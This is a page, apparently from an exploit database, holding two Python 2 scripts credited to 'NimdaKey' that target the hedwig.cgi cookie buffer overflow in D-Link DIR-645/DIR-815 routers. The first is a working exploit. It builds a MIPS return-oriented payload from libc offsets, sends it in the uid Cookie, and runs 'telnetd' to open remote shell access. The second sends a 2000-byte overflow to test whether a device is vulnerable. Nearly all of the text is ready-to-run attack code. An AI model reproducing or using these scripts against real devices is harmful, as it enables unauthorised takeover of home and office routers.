#!/usr/bin/env python
#####################################################################################
# Exploit for the DIR-645/DIR-815 hedwig.cgi stack based buffer overflow
#vulnerability. #
#
## NimdaKey #test# # 06-12-2014
#####################################################################################
import sys
import time
import string
import socket
from random import Random
import urllib, urllib2, httplib
class MIPSPayload:
BADBYTES = [0x00]
LITTLE = "little"
BIG = "big"
FILLER = "A"
BYTES = 4
def __init__(self, libase=0, endianess=LITTLE, badbytes=BADBYTES):
self.libase = libase
self.shellcode = ""
self.endianess = endianess
self.badbytes = badbytes
def rand_text(self, size):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
random = Random()
for i in range(size):
str += chars[random.randint(0,length)]
return str
def Add(self, data):
self.shellcode += data
def Address(self, offset, base=None):
if base is None:
base = self.libase
return self.ToString(base + offset)
def AddAddress(self, offset, base=None):
self.Add(self.Address(offset, base))
def AddBuffer(self, size, byte=FILLER):
self.Add(byte * size)
def AddNops(self, size):
if self.endianess == self.LITTLE:
self.Add(self.rand_text(size))
else:
self.Add(self.rand_text(size))
def ToString(self, value, size=BYTES):
data = ""
for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)
if self.endianess != self.LITTLE:
data = data[::-1]
print data
return data
def Build(self):
count = 0
for c in self.shellcode:
for byte in self.badbytes:
if c == chr(byte):
raise Exception("Bad byte found in shellcode at offset %d: 0x%.2X" % (count, byte))
count += 1
return self.shellcode
def Print(self, bpl=BYTES):
i = 0
for c in self.shellcode:
if i == 4:
print ""
i = 0
sys.stdout.write("\\x%.2X" % ord(c))
sys.stdout.flush()
if bpl > 0:
i += 1
print "\n"
class HTTP:
HTTP = 'http'
def __init__(self, host, proto=HTTP, verbose=False):
self.host = host
self.proto = proto
self.verbose = verbose
self.encode_params = True
def Encode(self, data):
#just for DIR645
if type(data) == dict:
pdata = []
for k in data.keys():
pdata.append(k + '=' + data[k])
data = pdata[1] + '&' + pdata[0]
else:
data = urllib.quote_plus(data)
return data
def Send(self, uri, headers={}, data=None, response=False,encode_params=True):
html = ""
if uri.startswith('/'):
c = ''
else:
c = '/'
url = '%s://%s' % (self.proto, self.host)
uri = '/%s' % uri
if data is not None:
data = self.Encode(data)
#print data
if self.verbose:
print url
httpcli = httplib.HTTPConnection(self.host, 80, timeout=10)
httpcli.request('POST',uri,data,headers=headers)
response=httpcli.getresponse()
#print response.status
print response.read()
if __name__ == '__main__':
libc = 0x2aaf8000#0x40854000#
target = {
"1.03" : [
0x531ff,
0x158c8,
0x159cc,
],
"815-1.01" : [
0x531ff,
0x158c8,
0x159cc,
],
"test" : [
0x1994C444,
0x1994C444,
0x1994C444,
],
}
v = '815-1.01'
cmd = 'telnetd'
ip = '192.168.0.1'
payload = MIPSPayload(endianess="little", badbytes=[0x0d, 0x0a])
payload.AddNops(973) # filler
payload.AddAddress(target[v][0], base=libc) # $s0
payload.AddNops(4) # $s1
payload.AddNops(4) # $s2
payload.AddNops(4) # $s3
payload.AddNops(4) # $s4
payload.AddAddress(target[v][2], base=libc) # $s5
payload.AddNops(4) # unused($s6)
payload.AddNops(4) # unused($s7)
payload.AddNops(4) # unused($gp)
payload.AddAddress(target[v][1], base=libc) # $ra
payload.AddNops(4) # fill
payload.AddNops(4) # fill
payload.AddNops(4) # fill
payload.AddNops(4) # fill
payload.Add(cmd) # shellcode
pdata = {
'uid' : 'test',
'password' : 'AbC',
}
#open('t','w').write(payload.Build())
#sys.exit()
#print len(payload.Build())
header = {
'Cookie' : 'uid='+payload.Build(),
'Accept-Encoding': 'gzip, deflate',
'Content-Type' : 'application/x-www-form-urlencoded',
'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'
}
try:
HTTP(ip).Send('hedwig.cgi', data=pdata,headers=header,encode_params=False,response=True)
print '[+] exploit works !!'
except httplib.BadStatusLine:
print "Payload deliverd."
except Exception,e:
print "2Payload delivery failed: %s" % str(e)
#!/usr/bin/env python
#####################################################################################
# Exploit for the DIR-645 , execute path test
#
# # Tested against firmware versions 1.03. # #
# NimdaKey # # 06-Febru-2014
#####################################################################################
'''
return result:
DIR645:
<?xml version="1.0" encoding="utf-8"?>
<hedwig>
<result>OK</result>
<node></node>
<message>No modules for Hedwig</message>
</hedwig>
DIR815:
HTTP Error 500: Internal Server Error
'''
import sys
import string
import socket
from random import Random
import urllib, urllib2, httplib
class HTTP:
HTTP = "http"
HTTPS = "https"
def __init__(self, host, proto=HTTP, verbose=False):
self.host = host
self.proto = proto
self.verbose = verbose
self.encode_params = True
def Encode(self, string):
return urllib.quote_plus(string)
def Send(self, uri, headers={}, data=None, response=False,encode_params=True):
html = ""
if uri.startswith('/'):
c = ''
else:
c = '/'
url = '%s://%s%s%s' % (self.proto, self.host, c, uri)
if self.verbose:
print url
if data is not None:
data = urllib.unquote(urllib.urlencode(data))
req = urllib2.Request(url, data,headers)
rsp = urllib2.urlopen(req)
if response:
html = rsp.read()
#print rsp.status
print html
return html
if __name__ == '__main__':
ip='192.168.0.1'
pdata = {
'password' : '123',
'uid' : '3Ad4'
}
#print payload.Print()
header = {
'Cookie' : 'uid='+'A'*2000,
'Accept-Encoding': 'gzip, deflate',
'Connection' : 'Keep-Alive',
'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)'
}
try:
HTTP(ip).Send('hedwig.cgi', data=pdata,headers=header,encode_params=False,response=True)
except httplib.BadStatusLine:
print "Payload delivered."
except Exception, e:
print "Payload delivery failed: %s" % str(e)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation